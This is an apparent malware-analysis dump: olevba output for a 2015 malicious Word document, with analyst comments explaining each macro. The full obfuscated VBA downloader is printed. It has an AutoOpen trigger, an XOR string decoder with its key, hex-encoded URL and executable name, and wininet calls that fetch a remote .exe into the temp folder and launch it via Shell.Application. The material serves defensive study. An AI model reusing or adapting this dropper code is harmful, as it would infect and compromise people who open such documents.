dynamoo

Malicious Word macro

Apr 20th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- filename-1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: filename-1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: filename-1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Analyst note: RAMIRO is a pass-through. It ignores FELIX and calls CONRAD
  ' (module AMOS), the next hop in the call chain that ends in ORVILLE (module PERCY).
  16. Sub RAMIRO(FELIX As Long)
  17. CONRAD
  18. End Sub
  19.  
  ' Analyst note: auto-executable entry point. olevba reports AutoOpen as running when
  ' the Word document is opened, so the chain starts once macros are allowed to run.
  ' The argument 124 is never used by RAMIRO.
  20. Sub autoopen()
  21. RAMIRO (124)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: filename-1.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  ' Analyst note: ORVILLE is the core of the macro. It builds a file path, calls
  ' RANDOLPH to fetch remote content into that path, then calls RICARDO to open the
  ' file. HOMER is the object ELIAS created through LAURENCE; OLIVER is overwritten
  ' below. RICARDO never assigns its own return value, so ORVILLE returns False.
  35. Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
  36.  
  37. Dim DREW As Long
  ' LAURENCE creates the object named by the decoded ABRAHAM constant (hand-decoded
  ' for this review as Scripting.FileSystemObject); IGNACIO calls GetSpecialFolder(2)
  ' on it, which for that object is the temporary folder.
  38. Set OLIVER = IGNACIO(LAURENCE)
  39.  
  40. Dim JODY
  41.  
  42. Dim HUGO As String
  ' HUGO is the RODERICK constant decoded with key IRVING (a backslash-prefixed file
  ' name ending in .exe). The 2048 argument is padding: LIONEL doubles and discards it.
  43. HUGO = LIONEL(2048, IRVING, RODERICK)
  44.  
  ' Junk loop: DREW is not read afterwards.
  45. For DREW = 144 To 145
  46. DREW = DREW * 3
  47. Next DREW
  ' JODY = folder & file name, i.e. the path the fetched content is written to.
  48. JODY = OLIVER & HUGO
  49.  
  50.  
  ' The two WILFRED (FileExists) checks have empty bodies; their results are unused.
  51. If WILFRED(HOMER, JODY) Then
  52.  
  53. End If
  ' RANDOLPH performs the wininet download and writes the bytes to JODY.
  54. If RANDOLPH(589, JODY) Then
  55. End If
  56. If WILFRED(HOMER, JODY) Then
  57. End If
  58.  
  59.  
  ' RICARDO opens the written file through a second CreateObject'd object
  ' (hand-decoded as Shell.Application), which is the execution step.
  60. ORVILLE = RICARDO(OLIVER, HUGO, 9)
  61.  
  62. End Function
  63.  
  64. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  65. ANALYSIS:
  66. No suspicious keyword or IOC found.
  67. -------------------------------------------------------------------------------
  68. VBA MACRO CLAY.bas
  69. in file: filename-1.doc - OLE stream: u'Macros/VBA/CLAY'
  70. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Analyst note: IGNACIO returns NICHOLAS.GetSpecialFolder(2). The caller passes the
  ' object built by LAURENCE; for Scripting.FileSystemObject, 2 is the temporary folder.
  71. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  72. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  73. End Function
  ' Analyst note: pass-through hop. CALEIGH and the "BRUCE" literal are never used.
  74. Sub CALEB(CALEIGH As Double)
  75.  
  76. CAMERON ("BRUCE")
  77. End Sub
  78.  
  79.  
  80.  
  ' Analyst note: SHELDON is the string decoder. ERICK is the key and FRANKIE a hex
  ' string. For each hex pair i (1 .. Len(FRANKIE)/2) it XORs the pair's value
  ' (PRESTON) with the character code of one key character (GILBERTO) and appends
  ' the resulting character (RUDOLPH). Returns the decoded string.
  81. Public Function SHELDON(ERICK As String, FRANKIE As String) As String
  82.    
  83.     Dim STEWART As Integer
  84.     Dim DOYLE As Integer
  85.    
  86.    
  87.     Dim DARREL As Integer
  ' Junk loop: DARREL only takes the values 77 and 78, so the End is never reached.
  88. For DARREL = 77 To 78
  89. If DARREL = 70 Then End
  90. Next DARREL
  91.    
  92.     Dim ROGELIO As Long
  93.     Dim TERENCE As String
  ' The line continuations below only split "For ROGELIO = 1 To (SALVATORE(FRANKIE) / 2)";
  ' SALVATORE is Len, so the loop runs once per hex pair.
  94.     For ROGELIO = 1 _
  95.     To _
  96.     ( _
  97.     SALVATORE _
  98.     (FRANKIE) _
  99.     / 2)
  100.         STEWART = PRESTON(FRANKIE, ROGELIO)
  101.         DOYLE = GILBERTO(ERICK, ROGELIO)
  102.         TERENCE = TERENCE + RUDOLPH(STEWART, DOYLE)
  103.     Next ROGELIO
  104.    SHELDON = TERENCE
  105. End Function
  106.  
  ' Analyst note: pass-through hop. Calls ELIAS (module ROLANDO) with the value 2;
  ' SANTIAGO is unused and the later change to ALONZO has no effect.
  107. Public Function CAMERON(SANTIAGO As String)
  108. Dim ALONZO As Long
  109. ALONZO = 1
  110. ELIAS ALONZO * 2
  111. ALONZO = ALONZO + 4
  112. End Function
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  120. ANALYSIS:
  121. No suspicious keyword or IOC found.
  122. -------------------------------------------------------------------------------
  123. VBA MACRO ROLANDO.bas
  124. in file: filename-1.doc - OLE stream: u'Macros/VBA/ROLANDO'
  125. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  126.  
  127.  
  128.  
  ' Analyst note: ELIAS is the last hop before the payload logic. It creates the
  ' object returned by LAURENCE and hands it to ORVILLE (module PERCY). ERNESTO and
  ' the three For loops are filler: nothing reads their results.
  129. Public Function ELIAS(ERNESTO As Double)
  130.  
  ' Local variable that happens to share its name with the function LIONEL in module
  ' LAMAR. It is never assigned here; ORVILLE overwrites it through the ByRef parameter.
  131. Dim LIONEL As Object
  132.  
  133.  
  134.     Dim TAYLOR As Long
  135. For TAYLOR = 14 To 15
  136. TAYLOR = TAYLOR + 15
  137. Next TAYLOR
  138.    
  139.  
  140. Dim ELLIS  As Object
  141.  
  142.  
  143. For TAYLOR = 10 To 20
  144. TAYLOR = TAYLOR + 60
  145. Next TAYLOR
  146.    
  147.  
  ' LAURENCE (module DEXTER) calls CreateObject on a decoded string, hand-decoded
  ' for this review as Scripting.FileSystemObject.
  148. Set ELLIS _
  149. = LAURENCE()
  150. ERNESTO = ERNESTO + 7
  151. For TAYLOR = 232 To 233
  152. TAYLOR = TAYLOR + 28
  153. Next TAYLOR
  154. Dim LEWIS As Boolean
  155.  
  ' Download, write and open all happen inside ORVILLE; LEWIS is not used afterwards.
  156. LEWIS = ORVILLE(LIONEL, ELLIS)
  157. End Function
  158.  
  159.  
  160. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  161. ANALYSIS:
  162. No suspicious keyword or IOC found.
  163. -------------------------------------------------------------------------------
  164. VBA MACRO CORNELIUS.bas
  165. in file: filename-1.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167.  
  168. Option Explicit
  169.  
  ' Analyst note: HORACE, RODERICK, CARROLL and ABRAHAM are hex strings. SHELDON
  ' (module CLAY) converts each hex pair to a byte and XORs it with a character of the
  ' key IRVING. Decoded by hand for this review: ABRAHAM -> Scripting.FileSystemObject,
  ' HORACE -> Shell.Application, RODERICK -> a backslash-prefixed file name ending in
  ' .exe, CARROLL -> an http:// URL ending in .exe. The last two are this sample's file
  ' and network indicators; re-derive them with a decoder before using them in detections.
  170. Public Const HORACE = "163A372920620C3F23293A3724263B2A22"
  171. Public Const RODERICK = "19352024223875267D202B31"
  172. Public Const CARROLL = "2D2626357663622432233A38243A353723393D61302A3E7B70677D707962283736"
  173. Public Const ABRAHAM = "1631202C3C382421346B153D2937013C3F3828221C2739312626"
  174. Public Const IRVING = "TERRELLMOSES"
  175.  
  ' ROBIN: size of the fixed-length read buffer in RANDOLPH.
  ' CESAR / JOHCOLIN: first two arguments of InternetOpenA in MARCOS (agent string and
  ' access type; 1 is INTERNET_OPEN_TYPE_DIRECT).
  ' MALCOLM: flags argument of InternetOpenUrlA in WILBERT (&H4000000 is
  ' INTERNET_FLAG_NO_CACHE_WRITE).
  176. Private Const ROBIN = 4000
  177. Private Const CESAR As String = "NELSON"
  178. Private Const JOHCOLIN = 1
  179. Private Const MALCOLM = &H4000000
  180.  
  ' Analyst note: one decoding step, Chr(data byte Xor key byte).
  181. Public Function RUDOLPH(ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
  182.     RUDOLPH = Chr(STEWART Xor DOYLE)
  183. End Function
  184.  
  ' Analyst note: returns the numeric value of the ROGELIO-th hex pair of FRANKIE.
  ' WOODROW is a Mid$ wrapper, PETE gives the pair's start offset, and the 32 is padding.
  185. Public Function PRESTON(ByRef FRANKIE As String, ByRef ROGELIO As Long) As Integer
  186.  PRESTON = Val("&H" & (WOODROW(32, FRANKIE, PETE(ROGELIO), 2)))
  187. End Function
  ' Analyst note: 1-based start offset of hex pair number ROGELIO (1, 3, 5, ...).
  188. Public Function PETE(ByRef ROGELIO As Long) As Long
  189.  PETE = (2 * ROGELIO) - 1
  190. End Function
  191.  
  ' Analyst note: RANDOLPH downloads the resource at the decoded CARROLL URL through
  ' wininet and writes the bytes to the file JONATHON. GEOFFREY is unused. It returns
  ' True when the length of the received data (COLIN) is non-zero, otherwise the
  ' default False.
  192. Public Function RANDOLPH(GEOFFREY As Long, ByVal JONATHON As String) As Boolean
  193.     #If VBA7 _
  194.     And Win64 Then
  195.         Dim GUILLERMO As LongPtr, NOEL As LongPtr
  196.     #Else
  197.         Dim GUILLERMO As Long, NOEL As Long
  198.     #End If
  199.     Dim DREWO As Long
  200.     Dim DOMINIC As String * ROBIN, SPENCER As String
  201.     Dim DELBERT As Integer, COLIN As Double
  ' GUILLERMO: session handle from InternetOpenA (MARCOS); give up if it is 0.
  202.     GUILLERMO = MARCOS
  203.     If GUILLERMO = 0 Then
  204.         Exit Function
  205.     End If
  206.     Dim LUCAS As Boolean
  207.    
  ' WILBERT stores the InternetOpenUrlA handle in NOEL (ByRef) and always returns True.
  208.     If WILBERT(NOEL, GUILLERMO) Then
  209.     End If
  210.     If NOEL = 0 Then
  211.         COLIN = 0
  212.     Else
  ' SYLVESTER is InternetReadFile: up to ROBIN bytes go into DOMINIC and the byte
  ' count into DREWO. The first read copies the whole fixed-length buffer into SPENCER.
  213.         SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
  214.         SPENCER = DOMINIC
  215.           Dim RODOLFO As Integer
  ' Junk loop: RODOLFO never exceeds 322, so the End is never reached.
  216. For RODOLFO = 321 To 322
  217. If RODOLFO > 1232 Then End
  218. Next RODOLFO
  ' Keep reading until a read reports 0 bytes, appending only the bytes received.
  219.         Do While DREWO <> 0
  220.             SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
  221.                     SPENCER = SPENCER + Mid(DOMINIC, 1, DREWO)
  222.         Loop
  ' COLIN = length of the received data; DELBERT = free file number (LOWELL is FreeFile).
  223.              COLIN = SALVATORE(SPENCER): _
  224.              DELBERT = LOWELL("JERRY")
  ' Write the received data to JONATHON as a binary file.
  225.         Open JONATHON _
  226.             For Binary Access Write _
  227.         Lock Write _
  228.         As #DELBERT
  229.         Put #DELBERT, _
  230.                 , SPENCER
  231.         Dim EDMUND As Double
  ' Junk loop: EDMUND never equals 637.
  232.             For EDMUND = 62 To 63
  233.     If EDMUND = 637 Then End
  234. Next EDMUND
  235.         Close #DELBERT
  236.     End If
  ' WILSON is InternetCloseHandle.
  ' NOTE(review): it is declared ByRef, while the API takes the handle by value, so
  ' these calls may not actually close the handles - confirm.
  237.     WILSON NOEL
  238.     WILSON GUILLERMO
  239.     SPENCER = ""
  240.     If COLIN Then
  241.         RANDOLPH = True
  242.     End If
  243. End Function
  244.  
  245.  
  246.  
  247.  
  248. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  249. ANALYSIS:
  250. +------------+----------------+-----------------------------------------+
  251. | Type       | Keyword        | Description                             |
  252. +------------+----------------+-----------------------------------------+
  253. | Suspicious | Open           | May open a file                         |
  254. | Suspicious | Write          | May write to a file (if combined with   |
  255. |            |                | Open)                                   |
  256. | Suspicious | Put            | May write to a file (if combined with   |
  257. |            |                | Open)                                   |
  258. | Suspicious | Chr            | May attempt to obfuscate specific       |
  259. |            |                | strings                                 |
  260. | Suspicious | Xor            | May attempt to obfuscate specific       |
  261. |            |                | strings                                 |
  262. | Suspicious | Binary         | May read or write a binary file (if     |
  263. |            |                | combined with Open)                     |
  264. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  265. |            |                | be used to obfuscate strings (option    |
  266. |            |                | --decode to see all)                    |
  267. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  268. |            |                | may be used to obfuscate strings        |
  269. |            |                | (option --decode to see all)            |
  270. +------------+----------------+-----------------------------------------+
  271. -------------------------------------------------------------------------------
  272. VBA MACRO LAMAR.bas
  273. in file: filename-1.doc - OLE stream: u'Macros/VBA/LAMAR'
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275.  
  276.  
  277.  
  278.  
  ' Analyst note: SLIONEL is not referenced anywhere else in this listing.
  279. Public Const SLIONEL = "JOHN"
  280.  
  ' Analyst note: wininet.dll imports under meaningless names, which is why the API
  ' names appear only in the Alias strings:
  '   WILSON    = InternetCloseHandle
  '   GUSTAVO   = InternetOpenA
  '   SYLVESTER = InternetReadFile
  '   ROOSEVELT = InternetOpenUrlA
  ' The #If branch is the PtrSafe/LongPtr form for 64-bit VBA7; the #Else branch
  ' declares the same four functions with Long handles.
  281. #If VBA7 And Win64 Then
  282. Public _
  283. Declare _
  284. PtrSafe _
  285. Function _
  286. WILSON Lib _
  287. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  288. Public _
  289. Declare _
  290. PtrSafe _
  291. Function _
  292. GUSTAVO Lib _
  293. "wininet.dll" Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As LongPtr
  294. Public _
  295. Declare _
  296. PtrSafe _
  297. Function _
  298. SYLVESTER Lib _
  299. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  300. Public _
  301. Declare _
  302. PtrSafe _
  303. Function _
  304. ROOSEVELT Lib _
  305. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  306. #Else
  307. Public Declare Function WILSON Lib "wininet.dll" _
  308. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  309. Public Declare Function GUSTAVO Lib "wininet.dll" _
  310. Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As Long
  311. Public Declare Function SYLVESTER Lib "wininet.dll" _
  312. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  313. Public Declare Function ROOSEVELT Lib "wininet.dll" _
  314. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  315. #End If
  316.  
  317.  
  ' Analyst note: Mid$ wrapper. It returns DOYLE characters of KRISTOPHER starting at
  ' STEWART. SAMMY is padding: it is modified but never read.
  318. Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
  319.     WOODROW = Mid$(KRISTOPHER, STEWART, DOYLE)
  320.     SAMMY = SAMMY + 50
  321. End Function
  ' Analyst note: MARCOS opens the wininet session via InternetOpenA, using the agent
  ' string CESAR and access type JOHCOLIN from module CORNELIUS, and returns the handle.
  ' The conditional compilation only selects the return type.
  322. #If VBA7 _
  323.     And Win64 Then
  324. Public Function MARCOS() As LongPtr
  325.  #Else
  326. Public Function MARCOS() As Long
  327.  
  328.  #End If
  329.  
  330.  MARCOS = GUSTAVO(CESAR, JOHCOLIN, vbNullString, vbNullString, 0)
  331. End Function
  332.  
  ' Analyst note: thin wrapper around the SHELDON decoder (key TERRENCE, hex string
  ' ENRIQUE). FREDDIE is padding: it is doubled and never read.
  333. Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
  334. FREDDIE = FREDDIE * 2
  335. LIONEL = SHELDON(TERRENCE, ENRIQUE)
  336.    
  337. End Function
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  345. ANALYSIS:
  346. +------------+----------------+-----------------------------------------+
  347. | Type       | Keyword        | Description                             |
  348. +------------+----------------+-----------------------------------------+
  349. | Suspicious | Lib            | May run code from a DLL                 |
  350. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  351. |            |                | may be used to obfuscate strings        |
  352. |            |                | (option --decode to see all)            |
  353. | IOC        | wininet.dll    | Executable file name                    |
  354. +------------+----------------+-----------------------------------------+
  355. -------------------------------------------------------------------------------
  356. VBA MACRO DEXTER.bas
  357. in file: filename-1.doc - OLE stream: u'Macros/VBA/DEXTER'
  358. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  359.  
  ' Analyst note: returns JERMAINE.FileExists(FORREST) as a Boolean. Both callers in
  ' ORVILLE ignore the result.
  360. Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
  361. If JERMAINE.FileExists(FORREST) Then
  362. WILFRED = True
  363. Else
  364. WILFRED = False
  365. End If
  366. End Function
  367.  
  368.  
  ' Analyst note: returns the character code of the key character used for hex pair
  ' ROGELIO. The index is (ROGELIO Mod Len(ERICK)) + 1, so the key is used cyclically,
  ' starting from its second character. The 44 is padding for WOODROW.
  369. Public Function GILBERTO(ByRef ERICK As String, ByRef ROGELIO As Long) As Integer
  370. GILBERTO = Asc(WOODROW(44, ERICK, _
  371.         ((ROGELIO Mod SALVATORE(ERICK)) + 1), 1))
  372. End Function
  ' Analyst note: decodes ABRAHAM with key IRVING and passes the result to CreateObject.
  ' The ProgID never appears in clear text; it was hand-decoded for this review as
  ' Scripting.FileSystemObject.
  373. Public Function LAURENCE() As Object
  374. Dim ISMAEL As String
  375. ISMAEL = SHELDON(IRVING, ABRAHAM)
  376. Set LAURENCE = CreateObject(ISMAEL)
  377. End Function
  ' Analyst note: WILBERT decodes CARROLL (an http:// URL) and opens it with
  ' InternetOpenUrlA on session NOAH, using flags MALCOLM. The handle is returned
  ' through GRADY. The function always returns True, so the caller has to test GRADY
  ' to detect failure.
  378. #If VBA7 And Win64 Then
  379.        Public Function WILBERT(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  380.     #Else
  381.        Public Function WILBERT(ByRef GRADY As Long, NOAH As Long) As Boolean
  382.     #End If
  383.         Dim PHIL As Double
  384. Dim GUADALUPE As String
  385. Dim CLARK As Long
  ' The 893 is padding for LIONEL.
  386.     GUADALUPE = LIONEL(893, IRVING, CARROLL)
  387.  
  ' Junk loop: PHIL is not read afterwards.
  388. For PHIL = 14 To 15
  389. PHIL = PHIL + 5.5
  390. Next PHIL
  391.     GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, MALCOLM, 0)
  392.     WILBERT = True
  393. End Function
  394.  
  395.  
  396. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  397. ANALYSIS:
  398. +------------+--------------+--------------------------+
  399. | Type       | Keyword      | Description              |
  400. +------------+--------------+--------------------------+
  401. | Suspicious | CreateObject | May create an OLE object |
  402. +------------+--------------+--------------------------+
  403. -------------------------------------------------------------------------------
  404. VBA MACRO AMOS.bas
  405. in file: filename-1.doc - OLE stream: u'Macros/VBA/AMOS'
  406. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  407.  
  ' Analyst note: pass-through hop called from RAMIRO. It runs a junk loop and then
  ' calls CALEB (module CLAY). BERT is unused.
  408. Public Sub CONRAD()
  409.         Dim BERT As Long
  410.  
  411.     Dim ELBERT As Long
  412. For ELBERT = 5 To 11
  413. ELBERT = ELBERT * 3
  414. Next ELBERT
  415.  
  416. CALEB (8.2)
  417.  
  418. End Sub
  ' Analyst note: RICARDO is the execution step. It decodes HORACE with key IRVING
  ' (hand-decoded for this review as Shell.Application), creates that object and
  ' calls its Open method on the path OLIVER & HUGO, the file RANDOLPH has just written.
  ' TOMAS is not declared in this listing and RUBEN is unused. The function never
  ' assigns RICARDO, so it returns the default False.
  419. Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
  420.  
  421. Set TOMAS = CreateObject _
  422. (SHELDON _
  423. (IRVING, HORACE))
  424. Dim BRETT As Integer
  425. BRETT = TOMAS.Open(OLIVER & HUGO)
  426. End Function
  427.  
  ' Analyst note: Len wrapper. It hides the builtin behind another name.
  428. Public Function SALVATORE(KRISTOPHER As String) As Long
  429. SALVATORE = Len(KRISTOPHER)
  430. End Function
  ' Analyst note: FreeFile wrapper. The KRISTOPHER argument is ignored.
  431. Public Function LOWELL(KRISTOPHER As String) As Integer
  432.     LOWELL = FreeFile
  433. End Function
  434.  
  435.  
  436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  437. ANALYSIS:
  438. +------------+--------------+--------------------------+
  439. | Type       | Keyword      | Description              |
  440. +------------+--------------+--------------------------+
  441. | Suspicious | CreateObject | May create an OLE object |
  442. | Suspicious | Open         | May open a file          |
  443. +------------+--------------+--------------------------+